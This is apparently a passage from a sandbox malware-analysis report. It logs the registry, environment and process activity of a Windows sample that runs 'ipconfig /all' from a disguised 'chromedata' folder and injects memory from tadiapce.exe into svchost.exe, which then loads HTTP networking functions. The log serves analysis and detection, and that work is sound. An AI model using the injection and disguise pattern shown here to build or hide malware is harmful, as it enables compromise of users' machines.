Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 136, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\ipconfig.exe, os_pid = 0xcf4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #44: ipconfig.exe

109

Information	Value
ID	#44
File Name	c:\windows\system32\ipconfig.exe
Command Line	ipconfig /all
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:38, Reason: Child Process
Unmonitor	End Time: 00:03:39, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0xcf4
Parent PID	0x3ec (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x CF0 0x CC0 0x CBC 0x D14 0x D28 0x D24

Threads

Thread 0xcf0

109

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:33:44 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11063107	1	Fn
System	Get Time	type = Performance Ctr, time = 29239068005	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ipconfig.exe, base_address = 0xa30000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
COM	Create	interface = 432A1DA5-3888-4B9A-A734-CFF1E448C5B9, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER	1	Fn
Service	Open Manager	database_name = ServicesActive	1	Fn
Service	Open	database_name = ServicesActive	1	Fn
Service	Get Info	service_name = NapAgent	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 30	1	Fn Data
System	Get Computer Name	result_out = ZgW5tdPu, type = ComputerNameDnsHostname	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 49	1	Fn Data
System	Get Computer Name	type = ComputerNameDnsDomain	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 41	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 47	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 43	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 43	1	Fn Data
System	Get Network Adapter Info	-	1	Fn
System	Get Network Adapter Info	-	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 45	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 41	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 80	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 58	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 44	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 44	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 81	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 66	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 54	1	Fn Data
System	Get Time	type = System Time, time = 2019-05-14 15:33:44 (UTC)	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 73	1	Fn Data
System	Get Time	type = System Time, time = 2019-05-14 15:33:44 (UTC)	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 73	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 52	1	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}, value_name = Dhcpv6ClassId, data = 1, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}, value_name = DhcpClassId, data = 1, type = REG_NONE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 52	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 50	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 82	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 52	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 48	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 67	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 59	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 41	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 65	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 64	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 43	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 44	1	Fn Data

Process #45: svchost.exe

140

Information	Value
ID	#45
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:45, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:00:31

OS Process Information

Information	Value
PID	0xb28
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B38 0x B58 0x B68 0x B7C 0x B80 0x BFC 0x C04 0x A04 0x D40

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x50000, size = 367	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x60000, size = 112	50	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x602104, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10000000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10001000, size = 11264	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004000, size = 4608	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10006000, size = 1036	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10006000, size = 512	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10007000, size = 1024	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 22	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 12	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 16	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 26	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004000, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 24	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 17	5	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 16	36	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004084, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004088, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000408c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004090, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 14	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004094, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 20	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004098, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 6	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004008, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 21	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000400c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 19	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004010, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004014, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004018, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 13	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000401c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 12	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004020, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 9	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004024, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 11	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004028, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000402c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004030, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 15	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004034, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004038, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000403c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 10	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004040, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004044, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004048, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000404c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004050, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004054, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004058, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000405c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004060, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004064, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 25	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004068, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000406c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000407c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040ac, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040b0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004074, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 8	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x130000, size = 388	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x140000, size = 40	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 8	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x140000, size = 747	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x150000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1a0000, size = 128	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1c0000, size = 44	1	Fn Data

Threads

Thread 0xb38

135

Category	Operation	Information	Count	Logfile
Module	Load	module_name = WS2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 115, address_out = 0x75a93ab2	1	Fn
Module	Load	module_name = ACTIVEDS.dll, base_address = 0x6eb70000	1	Fn
Module	Get Address	module_name = c:\windows\system32\activeds.dll, function = 9, address_out = 0x6eb716e6	1	Fn
Module	Load	module_name = WININET.dll, base_address = 0x77230000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = HttpSendRequestW, address_out = 0x7725ba12	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = InternetConnectW, address_out = 0x7725492c	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = HttpOpenRequestW, address_out = 0x77254a42	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = InternetReadFile, address_out = 0x7724b406	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = InternetOpenW, address_out = 0x77259197	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = InternetCloseHandle, address_out = 0x7724ab49	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x773777a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleOutputCP, address_out = 0x76bbe210	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77389ac5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x76b6375d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76b5ca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpyA, address_out = 0x76b59793	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapCreate, address_out = 0x76b63ea2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x76b6395c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x76b5d9e8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpynW, address_out = 0x76b76118	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76b6452b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenA, address_out = 0x76b5a611	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExitThread, address_out = 0x7735f611	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77377760	1	Fn
